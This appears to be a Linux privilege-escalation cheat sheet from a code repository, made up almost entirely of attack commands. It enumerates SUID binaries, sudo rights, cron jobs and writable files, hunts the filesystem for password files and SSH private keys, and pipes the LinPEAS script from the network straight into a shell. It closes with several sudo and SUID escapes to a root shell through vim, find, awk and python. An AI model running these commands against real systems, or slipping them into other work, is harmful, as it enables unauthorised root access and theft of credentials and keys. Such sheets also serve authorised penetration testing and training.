71 lines
1.3 KiB
Text
71 lines
1.3 KiB
Text
% privesc, linux, escalation
|
|
|
|
# Find SUID binaries
|
|
find / -perm -4000 -type f 2>/dev/null
|
|
|
|
# Find SGID binaries
|
|
find / -perm -2000 -type f 2>/dev/null
|
|
|
|
# Check sudo permissions
|
|
sudo -l
|
|
|
|
# Find writable directories
|
|
find / -writable -type d 2>/dev/null
|
|
|
|
# Find world-writable files
|
|
find / -perm -o+w -type f 2>/dev/null
|
|
|
|
# Check cron jobs
|
|
cat /etc/crontab
|
|
ls -la /etc/cron*
|
|
crontab -l
|
|
|
|
# Find capabilities
|
|
getcap -r / 2>/dev/null
|
|
|
|
# Check for docker group
|
|
id | grep docker
|
|
|
|
# Check kernel version (for exploits)
|
|
uname -a
|
|
|
|
# Check OS version
|
|
cat /etc/os-release
|
|
|
|
# LinPEAS
|
|
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
|
|
|
|
# LinEnum
|
|
./LinEnum.sh -t
|
|
|
|
# Check passwd file writable
|
|
ls -la /etc/passwd
|
|
|
|
# Check shadow file readable
|
|
ls -la /etc/shadow
|
|
|
|
# Find password files
|
|
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
|
|
|
|
# Check NFS exports (no_root_squash)
|
|
cat /etc/exports
|
|
|
|
# Find SSH keys
|
|
find / -name "id_rsa" 2>/dev/null
|
|
find / -name "authorized_keys" 2>/dev/null
|
|
|
|
# Check PATH hijacking
|
|
echo $PATH
|
|
ls -la /usr/local/bin
|
|
|
|
# GTFOBins sudo bypass - vim
|
|
sudo vim -c ':!/bin/sh'
|
|
|
|
# GTFOBins sudo bypass - find
|
|
sudo find . -exec /bin/sh \; -quit
|
|
|
|
# GTFOBins sudo bypass - awk
|
|
sudo awk 'BEGIN {system("/bin/sh")}'
|
|
|
|
# GTFOBins SUID - python
|
|
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
|